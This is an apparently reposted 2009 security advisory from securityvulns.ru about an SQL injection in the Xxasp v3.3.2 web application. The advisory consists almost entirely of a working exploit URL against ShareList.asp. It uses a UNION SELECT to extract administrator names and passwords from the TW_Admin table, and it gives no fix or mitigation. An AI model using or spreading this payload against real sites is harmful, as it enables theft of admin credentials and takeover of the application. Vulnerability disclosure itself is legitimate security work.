Computer Security

Security Advisory: Xxasp v3.3.2 Sql injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Theeta CMS (Cross Site Scripting,SQL Injection) Multiple Vulnerabilities

  Eshopbuilde CMS SQL Injection Vulnerability

  Cacti 0.8.7e: Multiple security issues

From:secu_lab_ir_(at)_yahoo.com <secu_lab_ir_(at)_yahoo.com>
Date:01.12.2009
Subject:Xxasp v3.3.2 Sql injection

########################## Securitylab.ir ########################
# Application Info:
# Name: Xxasp
# Version: 3.3.2
#################################################################
# Discoverd By: Secu_lab_ir@yahoo.com
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
#===========================================================
# http://site.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&
SearchCondition=rar' and 1=2 union select
1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################
# Security Research Team
###################################################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server